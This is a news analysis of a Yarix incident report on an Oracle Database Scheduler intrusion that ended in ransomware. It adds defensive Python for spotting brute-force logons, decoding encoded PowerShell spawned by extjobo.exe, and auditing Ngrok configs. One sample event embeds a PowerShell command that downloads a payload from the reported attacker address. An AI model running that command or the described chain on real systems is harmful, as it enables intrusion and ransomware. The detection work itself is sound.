Yarix’s Incident Response Team (YIR) has published an in-depth analysis of a targeted intrusion that leveraged an exposed Oracle Database Scheduler function to gain access to corporate infrastructure.
The attack began with repeated login attempts against an Oracle Database Server. According to YIR, “the entry point detected was the use of a function of Oracle DBS, an exposed service active on their Database Server, which allowed the execution of commands remotely.”
Logs revealed that after a series of failed login attempts, the threat actor successfully authenticated with elevated “SYSDBA” privileges. YIR noted that, “this evidence, which was no longer returning an error for using incorrect credentials, represented a symptom that the TA had plausibly obtained valid credentials for access to the database.”
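The pattern YIR describes, a run of failed SYSDBA logons from one client followed by a success, is a sequence a defender can alert on. The following Python is an added example (not Yarix's tooling or code from the report); it runs over a constructed, simplified four-column audit format rather than real Oracle audit output, and the hosts, timestamps, window and threshold are all assumptions chosen for illustration.

```python
from datetime import datetime, timedelta

# Constructed, simplified audit records for illustration (not real Oracle audit
# output): timestamp, client host, requested privilege, outcome.
SAMPLE_AUDIT = """\
2025-03-01T02:10:01 10.0.5.20 SYSDBA FAILED
2025-03-01T02:10:02 10.0.5.20 SYSDBA FAILED
2025-03-01T02:10:03 10.0.5.20 SYSDBA FAILED
2025-03-01T02:10:04 10.0.5.20 SYSDBA FAILED
2025-03-01T02:10:05 10.0.5.20 SYSDBA FAILED
2025-03-01T02:10:09 10.0.5.20 SYSDBA SUCCESS
2025-03-01T02:30:00 10.0.9.7 SYSDBA SUCCESS
"""


def parse_records(text):
    """Parse the constructed 4-column format into dicts with a datetime."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, priv, outcome = line.split()
        records.append({
            "ts": datetime.fromisoformat(ts),
            "host": host,
            "privilege": priv,
            "outcome": outcome,
        })
    return sorted(records, key=lambda r: r["ts"])


def detect_bruteforce_then_success(records, window=timedelta(minutes=10), threshold=3):
    """Flag a host whose SYSDBA success is preceded by at least `threshold`
    failures within `window`. Returns one alert per qualifying success."""
    alerts = []
    failures = {}  # host -> timestamps of failed SYSDBA logons seen so far
    for r in records:
        if r["privilege"] != "SYSDBA":
            continue
        host = r["host"]
        if r["outcome"] == "FAILED":
            failures.setdefault(host, []).append(r["ts"])
            continue
        if r["outcome"] == "SUCCESS":
            recent = [t for t in failures.get(host, []) if r["ts"] - t <= window]
            if len(recent) >= threshold:
                alerts.append({
                    "host": host,
                    "failures": len(recent),
                    "first_failure": recent[0],
                    "success_at": r["ts"],
                })
            failures[host] = []  # a success closes the current burst
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce_then_success(parse_records(SAMPLE_AUDIT)):
        print(f"{a['host']}: {a['failures']} SYSDBA failures, then success at {a['success_at']}")
```

The second host in the sample logs in cleanly and produces no alert; only the burst-then-success sequence does. In a real deployment the parser would be replaced by whatever feeds the database audit trail into the SIEM, and the window and threshold tuned to the site's normal administrative activity.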
Once inside, the attacker used Oracle’s External Jobs Scheduler (extjobo.exe) to execute commands with system-level privileges. This allowed them to drop batch scripts and run Base64-encoded PowerShell commands that reached out to a Command-and-Control (C2) server.
YIR explained: “The correlation between the evidence of the execution of the External Job Scheduler detected through other artifacts obtained from the system, and the almost simultaneous execution of Base64-encoded powershell commands… allowed us to affirm that even in this first instance ‘extjobo.exe’ was used for the execution of remote commands.”
One of these commands downloaded a payload from 80.94.95.227:5555, an IP address under the attacker’s control. Investigators also found links to public GitHub code designed to create TCP reverse shells, suggesting the adversary borrowed or adapted existing offensive tools.
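Two observations from the report are directly actionable for detection: PowerShell being spawned by extjobo.exe, and the use of Base64-encoded command lines, which only become readable once decoded (PowerShell's -EncodedCommand takes UTF-16LE text encoded as Base64). The Python below is an added example, not code from Yarix or the report. It runs over constructed process-creation events with Sysmon-style field names; the Oracle home path is an assumption, the encoded commands are built by the example itself, and the only indicator taken from the report is the 80.94.95.227:5555 address.

```python
import base64
import re

# Indicator taken from the report: the address the payload was fetched from.
C2_INDICATORS = {"80.94.95.227:5555"}

# Matches the -EncodedCommand parameter and its accepted abbreviations.
ENCODED_ARG_RE = re.compile(
    r"(?i)(?:^|\s)-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]+)"
)


def encode_ps(command):
    """Encode as PowerShell's -EncodedCommand expects: UTF-16LE, then Base64.
    Used here only to build the constructed sample events below."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(command_line):
    """Return the decoded script text, or None if no encoded argument is present."""
    m = ENCODED_ARG_RE.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


# Constructed process-creation events (Sysmon Event ID 1 style field names).
# The Oracle home path is an assumption, not taken from the report.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\oracle\product\19c\dbhome_1\bin\extjobo.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc "
        + encode_ps(r"Invoke-WebRequest http://80.94.95.227:5555/ -OutFile C:\PerfLogs\win.exe"),
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -enc " + encode_ps("Get-Date"),
    },
]


def triage(events):
    """Decode every encoded PowerShell command line and report the suspicious ones."""
    findings = []
    for ev in events:
        decoded = decode_encoded_command(ev["CommandLine"])
        reasons = []
        # Any PowerShell child of the Oracle external job runner is worth a look.
        if ev["ParentImage"].lower().endswith("\\extjobo.exe"):
            reasons.append("spawned_by_extjobo")
        hits = sorted(i for i in C2_INDICATORS if decoded and i in decoded)
        if hits:
            reasons.append("c2_indicator")
        if reasons:
            findings.append({
                "parent": ev["ParentImage"],
                "decoded": decoded,
                "indicators": hits,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f['parent']} -> {f['reasons']}: {f['decoded']}")
```

The parent-process check fires on its own, without any indicator match, because a database job runner has no routine reason to launch PowerShell; the decoded text is kept in the finding so an analyst sees what was actually run rather than an opaque Base64 string.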
The attackers next deployed Ngrok, a legitimate tunneling utility, to establish an encrypted connection between their system and the compromised server. YIR observed, “the TA used it to establish an encrypted HTTPS tunnel, through which traffic between its device and the compromised database server passed.”
A configuration file containing the Ngrok authentication token was created directly on the victim’s server, enabling persistent, covert access over RDP (Remote Desktop Protocol).
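Because the Ngrok agent reads its authentication token and tunnel definitions from a configuration file on disk, that file is itself a durable artifact for responders. The Python below is an added example, not code from Yarix or the report: it reads the small subset of an ngrok.yml that matters for triage (the authtoken and any tunnel definitions) from a constructed sample in the v2-style layout, masks the token so it can be cited in a ticket without being re-exposed, and reports whether a TCP tunnel to port 3389 (RDP) is defined. The sample contents and token value are constructed placeholders, not recovered from the incident.

```python
import re

# Constructed sample in the layout of an ngrok v2-style agent config file
# (ngrok.yml). Not recovered from the incident; the token is a placeholder.
SAMPLE_NGROK_CONFIG = """\
authtoken: 2PLACEHOLDERTOKEN_abcdef0123456789
tunnels:
  rdp:
    proto: tcp
    addr: 3389
"""

AUTHTOKEN_RE = re.compile(r"^\s*authtoken:\s*['\"]?([A-Za-z0-9_\-]+)")
TUNNEL_NAME_RE = re.compile(r"^  ([\w-]+):\s*$")        # tunnel names sit at two-space indent
TUNNEL_FIELD_RE = re.compile(r"^ {4,}([\w-]+):\s*(\S+)")  # their fields are nested deeper


def parse_ngrok_config(text):
    """Minimal line-based reader for the subset of ngrok.yml used in triage."""
    cfg = {"authtoken": None, "tunnels": []}
    current = None
    for line in text.splitlines():
        m = AUTHTOKEN_RE.match(line)
        if m:
            cfg["authtoken"] = m.group(1)
            continue
        m = TUNNEL_NAME_RE.match(line)
        if m:
            current = {"name": m.group(1)}
            cfg["tunnels"].append(current)
            continue
        m = TUNNEL_FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return cfg


def mask_token(token):
    """Keep only the ends so a report can reference the token without leaking it."""
    if not token or len(token) < 8:
        return None
    return f"{token[:4]}...{token[-4:]}"


def assess_ngrok_config(cfg):
    """Summarise what the file would give whoever controls this agent."""
    rdp = [t for t in cfg["tunnels"]
           if t.get("proto") == "tcp" and str(t.get("addr", "")).endswith("3389")]
    return {
        "has_authtoken": cfg["authtoken"] is not None,
        "token_masked": mask_token(cfg["authtoken"]),
        "rdp_exposed": bool(rdp),
        "tunnels": [t["name"] for t in cfg["tunnels"]],
    }


if __name__ == "__main__":
    print(assess_ngrok_config(parse_ngrok_config(SAMPLE_NGROK_CONFIG)))
```

The token itself is the item to act on: revoking it at the Ngrok side closes the tunnel regardless of what remains on the host, and the masked form is enough to tie the revocation back to the artifact in the case notes.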
With persistence in place, the adversary escalated privileges by creating a new local account named Admine$ and adding it to the administrators group. Tools like Process Hacker were dropped to assist in credential harvesting and process manipulation.
Finally, the attackers staged and executed ransomware. YIR detailed that, “the encryption took place, once the privilege escalation was performed, through the ransomware file ‘win.exe’, which was present at the path ‘C:\PerfLogs\win.exe’.”
The ransomware created scheduled tasks for persistence, generated ransom notes titled Elons_Help.txt, and attempted to erase traces by purging recycle bin directories and deleting executed payloads.

Attackers combined credential brute-forcing, legitimate administrative features (Oracle External Jobs), tunneling tools (Ngrok), and custom ransomware to achieve their objectives.
As Yarix concludes, incident responders must expect adversaries to “exploit the foothold obtained in the corporate infrastructure to extend control within it for malicious purposes.” Proactive patching, strict service exposure policies, and detailed log retention remain vital defenses against such attacks.